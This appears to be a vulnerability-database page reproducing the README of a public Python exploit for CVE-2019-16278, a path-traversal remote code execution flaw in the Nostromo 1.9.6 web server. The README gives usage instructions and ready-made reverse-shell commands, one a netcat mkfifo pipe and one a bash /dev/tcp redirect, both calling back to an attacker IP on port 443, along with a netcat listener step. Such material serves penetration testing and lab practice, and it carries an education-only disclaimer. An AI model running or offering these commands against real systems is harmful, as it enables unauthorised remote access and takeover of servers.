来源

关联漏洞

描述

An unauthenticated attacker can force server points to a shell file like ‘/bin/sh’ and execute arbitrary commands due to the failure in verifying the URL which leads to path traversal to any file that exists in the system. Nostromo’s versions such as 1.9.6 fail to verify this URL 

介绍

**Repository:** [https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git](https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git)  

## 📜 Description  
This repository contains a Python exploit for **CVE-2019-16278**, a vulnerability in **Nostromo 1.9.6** (a web server). The vulnerability allows for **Remote Code Execution (RCE)** by exploiting directory traversal to execute arbitrary commands on the target system.

## 🚀 Features  
- Execute custom shell commands on the vulnerable target.  
- Support for reverse shell payloads.  
- Ability to customize the size of the response from the target.  

---

## 🛠️ Requirements  
- **Python 3.x**  
- A machine running **Nostromo 1.9.6** (the vulnerable target).  
- **Netcat (nc)** to catch reverse shells.  

---

## ⚙️ Usage  

### Step 1: Clone the Repository  
```bash
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Step 2: Run the Exploit

python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

Arguments:
Argument	Description	Required	Default
-t, --target	The target IP address	Yes	None
-p, --port	The target port	Yes	None
-c, --command	The command to execute on the server	Yes	None
-b, --bytes	Number of bytes to read in response	No	4096
🧑‍💻 Examples
Example 1: Run whoami on the Target

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Example 2: Reverse Shell with Netcat

Step 1: Start a Netcat listener on your attacking machine:

nc -lvnp 443

Step 2: Execute the exploit with a reverse shell payload:

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Example 3: Reverse Shell using /dev/tcp

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Vulnerability Details

    CVE: CVE-2019-16278
    Affected Software: Nostromo 1.9.6 Web Server
    Type: Directory Traversal -> Remote Code Execution

⚠️ Disclaimer

This tool is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized access to systems is illegal. Use responsibly.

文件快照

 [4.0K]  /data/pocs/62dc2c0dd44576a01aa57231819c48d232484a6a
├── [1.2K]  exploit.py
└── [2.3K]  README.md

0 directories, 2 files

备注